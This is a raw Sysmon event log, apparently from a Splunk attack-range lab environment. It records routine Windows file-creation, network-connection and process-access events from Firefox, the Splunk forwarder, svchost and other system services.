Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\yap1cmsg.default-release\cache2\doomed\28073MD5=47BDA9BA9E1B2DBEF802A3191CE22CDA,SHA256=BC00A7D47409FFACF21399B6889034494797F7A6FC921B9B6F95CCCAA8DB3AAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:25.602{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-140MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000289953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:25.542{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\AlternateServices.txt2022-02-22 11:23:49.894 23542300x8000000000000000289952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:25.542{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\AlternateServices.txtMD5=78FCA839B241E43D881493DA2C2F3BBE,SHA256=F9B14EA03B6F7680360D51C0A8FD3CCF9BE464B8562B4935C6E50BEEE81246FD,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000289951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:25.395{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\SiteSecurityServiceState.txt2022-02-22 11:23:49.748 23542300x8000000000000000289950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:25.395{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\SiteSecurityServiceState.txtMD5=C22BCFCBC00F21DB0F5CB296FE17F6F8,SHA256=3899E1653B8C10E98E7F13EDB7817114455DB59237A0B92CA9C9FAAA48CC6239,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:25.095{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=03C081CAD9079E4B63AC97365B333815,SHA256=E464A0082296E4C3817B82C7BDA66F6B73F04474BFC72588EFCB4EFCA87C6F31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217614Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:24.997{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EE597F776A17E42F08D3F2EEFCCF7AA,SHA256=7BD43585F083F0CCE5E019F1F9289BCB6A0E92CCD4D7CAA9D6C819CD8C19D9C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:26.117{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F88BB0E90D9F433EFE02A4B990AD50C,SHA256=E7A3922E693C26E0DD6991DA939499BA8315A40222BE43CBF805AA815A5AC4C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217615Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:26.012{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DAF8107156AF5ECAF311183FE6437A7,SHA256=E079783DAA8375F7289C9702AE7022C685B1776FD17C4E0E9145998F6E01548A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217617Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:25.615{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51407-false10.0.1.12-8000- 23542300x8000000000000000217616Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:27.028{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE39B424078FC7BA493C7C1436B62148,SHA256=32790702C9E1899D1F1236DDBECE092DC977D3E6E97ECDF1182593E19210DE68,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:25.533{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53557-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000289958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:25.058{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53556-false34.117.237.239239.237.117.34.bc.googleusercontent.com443https 23542300x8000000000000000289957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:27.130{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9124A179C0847313E201BCFD688C7FF7,SHA256=3634E08C5EAABBB4CEDBD5A894015D32011BC6C33AED42DB57409CBD985B55F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217618Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:28.200{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76A0A04A21E90E1BEBC6CA1D27EC1DE0,SHA256=0F036027DCEE43D1C6EC5894077C8BE3526770239D661F2E710526460C0D63D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:28.145{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=228615DBD0A81DE3DEFD89508D56A033,SHA256=D59A5F03421F3248D83B8DD0059B164FEB536D0FAF8E1BF35EC496053F6EB844,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217619Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:29.434{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8C3A9585246D95F5F7A3CCE83E8FD79,SHA256=D98EEC7C570F597EF24A23F4615566199426311856D5BE52F9BB54CF8ADD819E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:27.871{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local55030- 23542300x8000000000000000289961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:29.167{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE937F946A8F84E86D7C7A3D7B3A545B,SHA256=518FE8E2FEA0A5DFC880A0B75DBE09B25BE8BB836DD32BD277160C8CF42F449E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217621Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:30.600{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A43EABC8A6EF2A32EEAF36E45D70EF11,SHA256=A1A62C92A1A700078DA46B1DD34336AE2EEC0D285E128BBAA77D1BE7323952D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:30.183{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E09CD56FE88681BD6A0DB45579514634,SHA256=81BE4C91F265389249E3EE71B2A106ECBB84781E2F61CEBAD79B182E7FF7BADD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217620Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:30.340{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=599847DF6E704C4A16F175C996DD90E9,SHA256=334DCA316AC1C4480C8ADE01F0C1047D18CC992C04473E2C004CBBAEDCE09296,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217622Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:31.621{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA6AAF96A2687B121D32B61D9EE246F4,SHA256=E38ECA98FD162B9F7D46CC21747E0C9689360EA2CCAC892BA301A9CE91B031E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:31.198{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6ABFE5A3FF12E153C05CC8C2EDB5E10,SHA256=841645EBC6A771E0D0B2DBC27E47F6980DA625422C880C97874A5F1D63973AD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217623Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:32.668{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA57C0DE6AA6E328D4255CF65D7B8D28,SHA256=26B679D3F74507676CBC0A59F7400FBFA8AEFF32D44FD9DF7B19FCE07ED4F7CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:32.213{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7A26FC8400C95791009D3D44FA1A9A3,SHA256=CBCF08FA30AFEB7F942174B4C179D06B7BC960900526A51A18FE11BAB785E262,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217624Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:33.684{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB07FA24F281A31D1092E26373A505F9,SHA256=012A359FE2349911771F7902BCFFF6DF9C0EC51A2FD77CB4764755ADF2B181ED,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:30.672{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53558-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:33.381{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=6EDFAC2090839678FA75D8DAA91DAB99,SHA256=3E0315A1523B3C370B45F51FDF9F7C34396B85F64505CDA91596830FC9080B0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:33.228{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5665EAF9DA1278FCC4B08C2EDF114CAC,SHA256=DCE4A0C39A945E7D95FB318E86DE5E60320E23EEA0B391FFD41E3C207D126C99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217625Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:34.902{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1849F2C7BB725CD29B0E4296EE4038DE,SHA256=19E16F1ABD1595C15DC74DD9BB2C8486F01710642E24BEB901EB0C113E076659,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:34.244{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA65705B765735729C391259DC8FDF38,SHA256=7DB4D951C997DEDD4C88E44BE442C360AAFC0BBEEDE5659A35D2D2BA1B4E604A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217627Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:35.918{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94BE467B9B04C3133DAA488E03EC676F,SHA256=250A5E86B7C6226F2FD37FAD5A48ACF99E5696FE67E058270D7F4CE87136F5EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:35.281{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8400102D39FF63E832F4A7A083E89A8E,SHA256=8798F49B5DF7DD9EFAC1339DB4E6604C46393220E9A62B19A379CF4E81E6E418,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217626Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:31.630{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51408-false10.0.1.12-8000- 23542300x8000000000000000217628Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:36.933{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2DEFD5775ED5AC9E02CCB5705CDE144,SHA256=4471A73E42194B950C38DFE4D87B7022DE721D2698284AAF4C537049C0B56062,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:36.296{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD73101F979196A708E4197BDEDD844A,SHA256=ABA625AA3D7329048DF7E0F81625A62092BB6B0EED551846987C686408C867CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217629Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:37.980{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=665CBF9540AAA126F5221BBA87D6F748,SHA256=04C7FD12B57AFA693FCD525917569F1B161AB49FB2308332416CB8BF434A39B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:37.796{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:37.796{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=8AC3BE67220ED040E9C3445363260E16,SHA256=FBC546756711CB0A1590E110B8C5EC488FEDE2F3DFB9280619701D97A30CA008,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:37.312{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED8DBBD6A9C4B1652028C425CD0E3BCF,SHA256=08ADF82BDC1C18EAB0D435B1443EBDB6D8F1AE0B8F2174B08596089CC4FBA795,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289984Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:38.998{C8EA50B7-F11F-6215-1400-000000003802}10481152C:\Windows\System32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1440C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+5bab|c:\windows\system32\pcasvc.dll+5b07|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+3534e|C:\Windows\System32\RPCRT4.dll+20cc7|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289983Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:38.992{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289982Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:38.991{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289981Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:38.991{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289980Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 